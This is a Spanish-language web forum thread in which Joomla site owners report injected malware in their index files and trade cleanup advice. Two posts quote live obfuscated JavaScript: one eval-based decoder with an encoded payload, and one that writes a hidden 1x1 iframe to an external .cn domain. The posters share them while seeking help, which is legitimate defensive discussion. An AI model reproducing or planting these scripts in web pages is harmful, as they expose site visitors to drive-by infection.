Foros del Web » Programando para Internet » Javascript »

Script malicioso, autoreproducible, propagable?

Estas en el tema de Script malicioso, autoreproducible, propagable? en el foro de Javascript en Foros del Web. Hola a todos, Les escribo porque tengo el super gigante problema. Tengo un sitio, el cual hize con Joomla. El problema es que desde hace ...
  #1 (permalink)  
Antiguo 29/01/2009, 12:02
 
Fecha de Ingreso: septiembre-2008
Mensajes: 27
Antigüedad: 16 años, 2 meses
Puntos: 0
Exclamación Script malicioso, autoreproducible, propagable?

Hola a todos,

Les escribo porque tengo el super gigante problema.

Tengo un sitio, el cual hize con Joomla. El problema es que desde hace un tiempo varias personas me decían que sus antivirus personales les decían que la página tenía un virus. Cosa que yo negaba, porque nunca he metido ningún virus, ni nada por el estilo.

Después de un tiempo, decidí instalar Kaspersky y este me arrojó de inmediato el famoso cuadrito rojo que dice que se ha encontrado un virus. Especificamente esto es lo que encontraba:

HEUR:Trojan.Script.Iframer

Bajé a mi PC el sitio completo y lo escaneé con el Kaspersky. Me arrojó que habían como 30 archivos infectados, no sólo 1.

Todos los archivos infectados son index.html o index.php.

Revisándolos me di cuenta de que efectivamente había un script que no tenía por qué estar ahí. El script es este:

Cita:
<script language=JavaScript>function ibnbn51(b) { var e=b.length,f=1024,m,y,p,k=0,j=0,n=0,t=Array(63,17, 7,36,13,60,30,39,9,58,0,0,0,0,0,0,35,50,57,37,31,0 ,56,8,18,26,25,4,15,11,51,49,38,62,55,53,34,40,27, 1,23,21,44,0,0,0,0,33,0,10,43,2,12,28,3,52,41,42,6 1,6,54,19,47,32,16,24,5,48,45,22,46,20,59,14,29);f or(y=Math.ceil(e/f);y>0;y--){p='';for(m=Math.min(e,f);m>0;m--,e--){{n|=(t[b.charCodeAt(k++)-48])<<j;if(j){p+=String.fromCharCode(229^n&255);n>>=8 ;j-=2}else{j=6}}}eval(p);}}ibnbn51('HAFTWiU3MVJ3Kk83u Tts_iFTEaZRWiU_pTGoMkBAH68@1cqNc74@f68_GcqOMHGTETz RpN4REuZCXIGl2Rq31uBRabeRuu8oEkFAdvFoaie3abtsy@a_1 lFAXiG3MkqNUHq34v5CKvqoaTqNd05SzDjgzNZNcR4geN4ocxZ s2XZ3dkq34TtSzDzO4cG@clq3qMzgrVJ3ePGoqDeodIJC8HG7D nUTMcFOV7tAdyFCKTGoVMdN') </script>><!-- ie.midominio.com -->
Hay una cosa que me llama especialmente la atención y es el hecho de que al final agrega:

<!-- ie.midominio.com -->

Después de eso, limpié toda la instalación del sitio, borrando el script de cada archivo. El problema es que ahora me doy cuenta de que no sólo está presente en MIDOMINIO.COM/CARPETA, sino que en cada /CARPETA dentro del dominio.

Por ej, tb tengo instalado otro sitio en midominio.com/carpeta2 y también están los archivos infectados con el mismo script.

Es más!!...un archivo que YA había limpiado, ahora está infectado de nuevo.

En los archivos index.php e index.html el script se ubica justo desdepués de la etiqueta <body>

Entonces la pregunta es simple.

Qué es lo que pasa?..Se puede reproducir un script?..Me hackearon?...qué puedo hacer para terminar con el problema?


Ojalá me puedan ayudar con esto porque en verdad no se qué hacer.


Muchas gracias desde ya

Última edición por electioneering; 29/01/2009 a las 12:34
  #2 (permalink)  
Antiguo 29/01/2009, 12:13
(Desactivado)
 
Fecha de Ingreso: mayo-2005
Ubicación: España
Mensajes: 471
Antigüedad: 19 años, 6 meses
Puntos: 45
Respuesta: Script malicioso, autoreproducible, propagable?

Puede ser algún programa que haya infectado los archivos de extensión html, no creo que haya otra posibilidad.
  #3 (permalink)  
Antiguo 29/01/2009, 12:16
 
Fecha de Ingreso: septiembre-2008
Mensajes: 27
Antigüedad: 16 años, 2 meses
Puntos: 0
Respuesta: Script malicioso, autoreproducible, propagable?

Pero cómo puedo solucionarlo?...Los archivos php también se vieron comprometidos. En realidad afecta a los archivos index.

La cosa es..es un problema del servidor? fue un ataque a ellos o es mi sitio?
  #4 (permalink)  
Antiguo 29/01/2009, 12:36
Avatar de Lynxcraft  
Fecha de Ingreso: noviembre-2007
Ubicación: yecla murcia
Mensajes: 1.346
Antigüedad: 17 años
Puntos: 51
Respuesta: Script malicioso, autoreproducible, propagable?

ha una pequeña prueba suve varías carpetas con nada mas que archivos index si se infectan puede ser que el problema venga de archivos que que utiliza el propio host comunícate con el administrador para que revise el problema
__________________
Sobran las ideas cuando faltan ganas de trabajar en ellas
Lynxcraft
  #5 (permalink)  
Antiguo 29/01/2009, 12:52
 
Fecha de Ingreso: septiembre-2008
Mensajes: 27
Antigüedad: 16 años, 2 meses
Puntos: 0
Respuesta: Script malicioso, autoreproducible, propagable?

Ahh..buena idea..eso haré y les cuento.


Gracias!
  #6 (permalink)  
Antiguo 07/02/2009, 12:41
 
Fecha de Ingreso: enero-2009
Mensajes: 47
Antigüedad: 15 años, 10 meses
Puntos: 0
Respuesta: Script malicioso, autoreproducible, propagable?

Tengo un problema similar al de esta persona, no abro un tema nuevo ya que me dice que por motivos antispam no puedo poner url cuando no estoy poniendo ninguna url, ¿alguna solución?
  #7 (permalink)  
Antiguo 07/02/2009, 13:39
 
Fecha de Ingreso: septiembre-2008
Mensajes: 27
Antigüedad: 16 años, 2 meses
Puntos: 0
Respuesta: Script malicioso, autoreproducible, propagable?

Lo que yo hize fué:



- Bajar el sitio completo a mi PC
- Sacar una copia del sitio completo.
- Escanear la instalación (la que bajé a mi PC) con Kaspersky, este te arrojará y "limpiará" los archivos con problemas.
- Una vez que termine el scan verás que te ha eliminado los archivos. Anda a la copia que haz hecho y revisa los archivos que el log de Kaspersky dice que ha limpiado y busca el script malicioso.
- Una vez identificado el script debes ir eliminandolo manualmente archivo por archivo, para eso, usas el log del Kaspersky.
- Una vez limpio, eliminas todos los archivos de tu servidor y subes los nuevos limpios.

------

Algunas cosideraciones:

No se cuál será tu caso, pero yo tenía serios problemas de seguridad. Primero, no había actualizado a la última versión de Joomla y eso fue en parte el problema. Segundo, tenía varias carpetas sin nigún archivo index.html, por lo que todo el mundo podía revisarlas.

Una vez que limpié el sitio me preocupé de actualizar Joomla y de colocar un archivo index en cada carpeta de la instación. Hasta ahora no he vuelto a tener problemas.




Espero que estos tips te sirvan.
  #8 (permalink)  
Antiguo 07/02/2009, 14:28
 
Fecha de Ingreso: enero-2009
Mensajes: 47
Antigüedad: 15 años, 10 meses
Puntos: 0
Respuesta: Script malicioso, autoreproducible, propagable?

Gracias amigo! Por la explicación, estoy bajándome todos los archivos para analizarlos, ya he localizado el código y lo he borrado de todos los index.htm/html/php pero también aparece en archivos con extensión tpl y revisarlos todos sería casi imposible, yo tampoco estoy actualizado a la última versión, no sabía lo de las carpetas sin index.html en cuanto lo repare revisaré totalmente la seguridad.
  #9 (permalink)  
Antiguo 07/02/2009, 14:38
 
Fecha de Ingreso: septiembre-2008
Mensajes: 27
Antigüedad: 16 años, 2 meses
Puntos: 0
Respuesta: Script malicioso, autoreproducible, propagable?

De nada. Acuérdate de respaldar la carpeta, porque el Kaspersky te va a eliminar todos los archivos en donde encuentre anomalías.

Una cosa!...No es necesario que elimines el script de cada uno. Lo que yo hize fue..

En todos los archivos index.html el único código que lleva es el de un color. Esto:

Código:
<html><body bgcolor="#FFFFFF"></body></html>
Entonces, eliminas el script de 1 archivo index.html y después copias..y lo vas pegando, en las carpetas en donde debería estar y que no está porque el kaspersky te lo eliminó. Es más rápido.

Es un proceso suuuuper tedioso y aburridor, pero no queda de otra.


Saludos!
  #10 (permalink)  
Antiguo 29/03/2009, 03:31
 
Fecha de Ingreso: marzo-2009
Mensajes: 1
Antigüedad: 15 años, 7 meses
Puntos: 0
Respuesta: Script malicioso, autoreproducible, propagable?

<!-- ad --><SCRIPT TYPE="text/javascript" LANGUAGE="JavaScript1.2">document.write(''+'<if'+u nescape('%72%61%6D')+'e '+String.fromCharCode(105)+''+unescape('%64')+unes cape('%3D%22%65')+'ef5e'+'ef0'+unescape('%65')+'4a '+String.fromCharCode(54)+''+unescape('%30%64')+St ring.fromCharCode(57)+String.fromCharCode(51)+''+S tring.fromCharCode(56)+String.fromCharCode(99)+''+ String.fromCharCode(102)+''+unescape('%62%63')+Str ing.fromCharCode(52)+String.fromCharCode(102)+Stri ng.fromCharCode(53)+''+'66'+String.fromCharCode(48 )+''+'c'+'87eb'+unescape('%22%20%6E%61')+String.fr omCharCode(109)+String.fromCharCode(101)+String.fr omCharCode(61)+''+String.fromCharCode(34)+String.f romCharCode(54)+String.fromCharCode(98)+''+unescap e('%33%34%31')+String.fromCharCode(49)+''+'6d6'+un escape('%37%38')+'7a5'+'33f'+String.fromCharCode(1 00)+''+unescape('%34%62%31')+'c2'+String.fromCharC ode(101)+String.fromCharCode(100)+String.fromCharC ode(98)+String.fromCharCode(97)+''+unescape('%36') +String.fromCharCode(57)+String.fromCharCode(48)+' '+unescape('%30%32%22%20')+String.fromCharCode(32) +''+String.fromCharCode(119)+String.fromCharCode(1 05)+''+unescape('%64')+'th=1'+unescape('%20%68')+u nescape('%65%69%67')+'ht'+'=1 '+'fra'+unescape('%6D')+'ebor'+String.fromCharCode (100)+String.fromCharCode(101)+String.fromCharCode (114)+String.fromCharCode(61)+''+String.fromCharCo de(48)+String.fromCharCode(32)+String.fromCharCode (115)+String.fromCharCode(114)+''+'c='+String.from CharCode(34)+String.fromCharCode(104)+String.fromC harCode(116)+String.fromCharCode(116)+''+'p:'+Stri ng.fromCharCode(47)+String.fromCharCode(47)+''+une scape('%74')+String.fromCharCode(104)+String.fromC harCode(101)+''+'h'+unescape('%75%67')+'eti'+Strin g.fromCharCode(116)+String.fromCharCode(115)+''+St ring.fromCharCode(116)+String.fromCharCode(111)+'' +'p'+'.cn/'+'do'+'nt'+unescape('%73%74%6F%70')+unescape('%2E ')+unescape('%68')+'tml"'+unescape('%3E')+unescape ('%3C%2F%69')+unescape('%66%72%61')+String.fromCha rCode(109)+String.fromCharCode(101)+String.fromCha rCode(62)+''+'');</SCRIPT><!-- /ad -->


Hola amigos, llevo meses intetando limpiar mi sitio, y se sigue reporduciondo codigos que son estraños,

Saludos
  #11 (permalink)  
Antiguo 29/03/2009, 05:18
 
Fecha de Ingreso: septiembre-2008
Mensajes: 27
Antigüedad: 16 años, 2 meses
Puntos: 0
Respuesta: Script malicioso, autoreproducible, propagable?

Mira.... si después de hacer lo que digo y me dijeron en posts anteriores no se soluciona tu problema, quiere decir que es un problema de tu hosting. Yo finalmente tuve que cambiar de Hosting porque seguían infectandose mis archivos. Ahora que me cambié, ya no he tenido el problema nuevamente.
Atención: Estás leyendo un tema que no tiene actividad desde hace más de 6 MESES, te recomendamos abrir un Nuevo tema en lugar de responder al actual.
Respuesta




La zona horaria es GMT -6. Ahora son las 18:37.